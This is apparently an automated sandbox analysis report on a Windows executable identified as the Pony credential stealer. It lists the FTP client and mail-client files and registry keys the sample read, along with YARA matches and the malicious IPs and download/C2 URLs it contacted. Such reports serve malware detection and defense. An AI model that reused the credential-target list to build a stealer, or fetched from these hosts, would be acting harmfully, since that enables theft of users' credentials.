Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\RhinoSoft.com\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\TurboFTP Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CuteFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FTPInfo\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\NetSarang\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\BitKinex\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\LeapWare\LeapFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GPSoftware\Directory Opus\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\BitKinex\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\AceBIT Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FTPInfo\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FileZilla\filezilla.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\BitKinex\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\CuteFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SharedSettings.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\SmartFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GHISLER\wcx_ftp.ini Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\BlazeFtp\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\4\Sites.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\INSoftware\NovaFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FTP Explorer\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FTPGetter\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\CuteFTP\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\NetSarang\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CuteFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CuteFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SmartFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224 Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\TurboFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\Frigate3\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\AceBIT\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FileZilla\sitemanager.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\TurboFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\RhinoSoft.com\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FTP Explorer\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\AceBIT\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\3\Quick.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FTPRush\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\Estsoft\ALFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\ExpanDrive\drives.js Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CuteFTP\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\3\Sites.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\BlazeFtp\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FTPGetter\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SharedSettings.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\AceBIT\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FTPRush\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Windows\32BitFtp.ini Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\4\Quick.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\3D-FTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Frigate3\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\NetSarang\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FTPRush\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\3\History.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\4\History.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Windows\wcx_ftp.ini Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword 1_2_0040E9CE
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword 1_2_0040E9CE

Remote Access Functionality
barindex
Yara detected Pony
Source: Yara match File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
67.215.225.205
 unknown United States
8100 ASN-QUADRANET-GLOBALUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://tokulances.sitebr.net/jV1.exe true
    		unknown
    http://67.215.225.205:8080/forum/viewtopic.php true
      		unknown
      http://ftp.approachit.com/jZy.exe true
        		unknown
        http://atualizacoes.issqn.net/FhPD.exe true
          		unknown
          http://67.215.225.205/forum/viewtopic.php true
            		unknown
            http://209.59.219.70/forum/viewtopic.php true
              		unknown